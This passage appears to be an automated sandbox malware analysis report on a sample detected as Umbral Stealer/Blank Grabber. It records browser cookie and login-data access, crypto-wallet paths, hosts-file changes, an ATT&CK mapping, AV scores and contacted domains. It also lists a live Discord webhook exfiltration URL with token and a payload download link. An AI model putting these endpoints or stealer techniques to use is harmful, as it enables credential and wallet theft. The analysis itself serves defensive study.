                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Lowering of HIPS / PFW / Operating System Security Settings

                        barindex
                        Modifies the hosts file
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Yara detected Blank Grabber
                        Source: Yara matchFile source: IDLBk4XMUa.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.IDLBk4XMUa.exe.20096170000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1853846152.00000200980F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000000.1255622080.0000020096172000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1853846152.0000020097FEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: IDLBk4XMUa.exe PID: 5076, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scr, type: DROPPED
                        Yara detected Umbral Stealer
                        Source: Yara matchFile source: IDLBk4XMUa.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.IDLBk4XMUa.exe.20096170000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.1255622080.0000020096172000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: IDLBk4XMUa.exe PID: 5076, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scr, type: DROPPED
                        Found many strings related to Crypto-Wallets (likely being stolen)
                        Source: IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020098670000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
                        Source: IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020098670000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: com.liberty.jaxx
                        Source: IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020098670000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 7C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                        Source: IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020098670000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 4C:\Users\user\AppData\Roaming\Ethereum\keystore
                        Source: IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020098670000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus
                        Source: IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020098670000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                        Source: IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020098670000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 8C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                        Source: IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020098670000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: keystore
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.logJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.logJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: Yara matchFile source: 00000000.00000002.1853846152.0000020097FEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: IDLBk4XMUa.exe PID: 5076, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected Blank Grabber
                        Source: Yara matchFile source: IDLBk4XMUa.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.IDLBk4XMUa.exe.20096170000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1853846152.00000200980F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000000.1255622080.0000020096172000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1853846152.0000020097FEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: IDLBk4XMUa.exe PID: 5076, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scr, type: DROPPED
                        Yara detected Umbral Stealer
                        Source: Yara matchFile source: IDLBk4XMUa.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.IDLBk4XMUa.exe.20096170000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.1255622080.0000020096172000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: IDLBk4XMUa.exe PID: 5076, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scr, type: DROPPED

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                        Windows Management Instrumentation                        		1
                        DLL Side-Loading                        		1
                        DLL Side-Loading                        		1
                        File and Directory Permissions Modification                        		1
                        OS Credential Dumping                        		22
                        System Information Discovery                        		Remote Services1
                        Archive Collected Data                        		1
                        Ingress Tool Transfer                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts11
                        Command and Scripting Interpreter                        		12
                        Registry Run Keys / Startup Folder                        		11
                        Process Injection                        		21
                        Disable or Modify Tools                        		LSASS Memory211
                        Security Software Discovery                        		Remote Desktop Protocol2
                        Data from Local System                        		21
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts1
                        PowerShell                        		Logon Script (Windows)12
                        Registry Run Keys / Startup Folder                        		11
                        Obfuscated Files or Information                        		Security Account Manager1
                        Process Discovery                        		SMB/Windows Admin SharesData from Network Shared Drive3
                        Non-Application Layer Protocol                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                        Timestomp                        		NTDS41
                        Virtualization/Sandbox Evasion                        		Distributed Component Object ModelInput Capture14
                        Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        DLL Side-Loading                        		LSA Secrets1
                        Application Window Discovery                        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        File Deletion                        		Cached Domain Credentials11
                        Remote System Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                        Masquerading                        		DCSync11
                        System Network Configuration Discovery                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
                        Virtualization/Sandbox Evasion                        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                        Process Injection                        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1487993 Sample: IDLBk4XMUa.exe Startdate: 05/08/2024 Architecture: WINDOWS Score: 100 48 ptb.discord.com 2->48 50 ip-api.com 2->50 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 Antivirus detection for dropped file 2->60 62 14 other signatures 2->62 8 IDLBk4XMUa.exe 15 16 2->8         started        signatures3 process4 dnsIp5 52 ip-api.com 208.95.112.1, 49700, 49705, 80 TUT-ASUS United States 8->52 54 ptb.discord.com 162.159.138.232, 443, 49707, 49708 CLOUDFLARENETUS United States 8->54 40 C:\ProgramData\Microsoft\...40cIxl.scr, PE32 8->40 dropped 42 C:\Windows\System32\drivers\etc\hosts, ASCII 8->42 dropped 44 C:\Users\user\AppData\...\IDLBk4XMUa.exe.log, ASCII 8->44 dropped 46 C:\ProgramData\...46cIxl.scr:Zone.Identifier, ASCII 8->46 dropped 64 Suspicious powershell command line found 8->64 66 Found many strings related to Crypto-Wallets (likely being stolen) 8->66 68 Self deletion via cmd or bat file 8->68 70 7 other signatures 8->70 13 powershell.exe 23 8->13         started        16 cmd.exe 8->16         started        18 powershell.exe 11 8->18         started        20 9 other processes 8->20 file6 signatures7 process8 signatures9 72 Loading BitLocker PowerShell Module 13->72 22 WmiPrvSE.exe 13->22         started        24 conhost.exe 13->24         started        74 Uses ping.exe to check the status of other devices and networks 16->74 26 conhost.exe 16->26         started        28 PING.EXE 16->28         started        30 conhost.exe 18->30         started        32 conhost.exe 20->32         started        34 conhost.exe 20->34         started        36 conhost.exe 20->36         started        38 6 other processes 20->38 process10

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        IDLBk4XMUa.exe86%VirustotalBrowse
                        IDLBk4XMUa.exe82%ReversingLabsByteCode-MSIL.Trojan.UmbralStealer
                        IDLBk4XMUa.exe100%AviraHEUR/AGEN.1307507
                        IDLBk4XMUa.exe100%Joe Sandbox ML

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scr100%AviraHEUR/AGEN.1307507
                        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scr100%Joe Sandbox ML
                        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scr82%ReversingLabsByteCode-MSIL.Trojan.UmbralStealer
                        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scr86%VirustotalBrowse

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        SourceDetectionScannerLabelLink
                        ptb.discord.com1%VirustotalBrowse
                        ip-api.com0%VirustotalBrowse

                        URLs

                        SourceDetectionScannerLabelLink
                        http://nuget.org/NuGet.exe0%URL Reputationsafe
                        http://nuget.org/NuGet.exe0%URL Reputationsafe
                        http://www.apache.org/licenses/LICENSE-2.00%URL Reputationsafe
                        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                        http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                        http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
                        http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
                        https://contoso.com/License0%URL Reputationsafe
                        https://contoso.com/Icon0%URL Reputationsafe
                        http://www.microsoft.0%URL Reputationsafe
                        http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                        https://contoso.com/0%URL Reputationsafe
                        https://nuget.org/nuget.exe0%URL Reputationsafe
                        http://ip-api.com0%URL Reputationsafe
                        https://oneget.orgX0%URL Reputationsafe
                        https://aka.ms/pscore680%URL Reputationsafe
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                        https://oneget.org0%URL Reputationsafe
                        http://ip-api.com/line/?fields=hosting0%URL Reputationsafe
                        http://ptb.discord.com0%Avira URL Cloudsafe
                        https://media.discordapp.net/attachments/1193832993945563176/127000310%Avira URL Cloudsafe
                        https://discord.com/api/v10/users/0%Avira URL Cloudsafe
                        https://discordapp.com/api/v9/users/0%Avira URL Cloudsafe
                        https://ptb.discord.com/api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N9EYMFmhbB3hhBZhMwKm0ApaPL0%Avira URL Cloudsafe
                        https://github.com/Pester/Pester0%Avira URL Cloudsafe
                        https://cdn.discordapp.com/attachments/1193832993945563176/1270003120704983090/Umbral-855271.zip?ex=0%Avira URL Cloudsafe
                        https://discord.com/api/v10/users/0%VirustotalBrowse
                        http://ptb.discord.com1%VirustotalBrowse
                        https://media.discordapp.net/attachments/1193832993945563176/1270003120704983090/Umbral-855271.zip?e0%Avira URL Cloudsafe
                        https://github.com/Blank-c/Umbral-Stealer0%Avira URL Cloudsafe
                        https://ptb.discord.com/api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N9EYMFmhbB3hhBZhMwKm0ApaPL1%VirustotalBrowse
                        https://github.com/Pester/Pester1%VirustotalBrowse
                        https://ptb.discord.com/api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N0%Avira URL Cloudsafe
                        https://ptb.discord.com0%Avira URL Cloudsafe
                        http://ip-api.com/json/?fields=2255450%Avira URL Cloudsafe
                        http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-0%Avira URL Cloudsafe
                        https://github.com/Blank-c/Umbral-Stealer2%VirustotalBrowse
                        https://ptb.discord.com1%VirustotalBrowse
                        https://discordapp.com/api/v9/users/0%VirustotalBrowse
                        http://ip-api.com/json/?fields=2255450%VirustotalBrowse
                        http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-0%VirustotalBrowse
                        https://ptb.discord.com/api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N1%VirustotalBrowse

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        ptb.discord.com
                        		162.159.138.232
                        		truetrueunknown
                        ip-api.com
                        		208.95.112.1
                        		truetrueunknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://ptb.discord.com/api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N9EYMFmhbB3hhBZhMwKm0ApaPLtrue
                        • 1%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        http://ip-api.com/line/?fields=hostingfalse
                        • URL Reputation: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://nuget.org/NuGet.exepowershell.exe, 0000000E.00000002.1352099439.00000296B1F23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1472391060.000001714092F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1472391060.0000017140A65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1406940608.000001713217B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1598197185.00000268DC603000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1598197185.00000268DC4CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1501813007.00000268CDE0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1666525413.000002B357376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1787792415.000002B365A3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1787792415.000002B365B72000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000014.00000002.1406940608.00000171320AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1501813007.00000268CDA18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1666525413.000002B356E61000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://discord.com/api/v10/users/NcIxl.scr.0.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000001F.00000002.1666525413.000002B35722D000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000E.00000002.1329869038.00000296A20D9000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://ptb.discord.comIDLBk4XMUa.exe, 00000000.00000002.1853846152.00000200980F6000.00000004.00000800.00020000.00000000.sdmp, IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020098129000.00000004.00000800.00020000.00000000.sdmpfalse
                        • 1%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001F.00000002.1666525413.000002B35722D000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
